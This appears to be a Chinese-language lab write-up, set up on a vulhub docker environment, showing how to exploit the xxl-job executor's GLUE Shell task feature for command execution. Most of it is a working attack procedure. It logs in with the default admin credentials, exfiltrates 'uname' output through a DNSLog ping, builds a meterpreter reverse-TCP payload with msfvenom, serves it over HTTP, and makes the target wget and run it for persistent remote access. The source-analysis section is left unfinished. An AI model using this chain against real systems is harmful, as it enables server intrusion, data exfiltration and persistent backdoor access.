1、漏洞描述及范围
描述
在xxl-job 执行器中,GLUE脚本代码,可以直接执行shell命令
范围
2、环境搭建
git clone https://github.com/vulhub/vulhub.git
cd vulhub/xxl-job/unacc/
docker-compose up -d
http://host:8080/xxl-job-admin/toLogin 任务调度中心登录
admin/123456
http://host:9999
3、漏洞利用
实现一键完成结果
判断其主机版本 dnslog 外带
ping -c 1 `uname -a| awk '{print $3}'`.25804b6b.dns.1433.eu.org
http://host:8080/xxl-job-admin/toLogin 任务调度中心登录
admin/123456
任务中心新增
运行模式选择 GLUE Shell
可直接执行shell命令
其余随便填填即可
操作编辑 刚刚新增的GLUE IDE
uname 版本外带
DNSLOG Platform dnslog 网站生成一个域名
ping -c 1 `uname -a| awk '{print $3}'`.5c3d45f9.dns.1433.eu.org
保存执行
版本外带成功
msf 生成木马,维权
生成木马 linux 32位
回连目标 <lhost >
回连端口 28081
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<lhost > LPORT=28081 -f elf > shell.elf
shell.elf
python3 -m http.server 8888 #开启8888端口共享
msf
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 28081
exploit
下载添加执行
wget http://host:8888/shell.elf
chmod +x shell.elf
./shell.elf
将上面语句添加到命令执行的地方,和之前的uname 外带一致
然后保存执行
看到已经上线
4、源代码分析
search -f xxl-job* 搜索源码
下载 xxl-job-executor-sample-springboot-2.2.0.jar
download /usr/src/xxl-job-executor-sample-springboot-2.2.0.jar
下载到了 /root 目录下,下载到本地
没看懂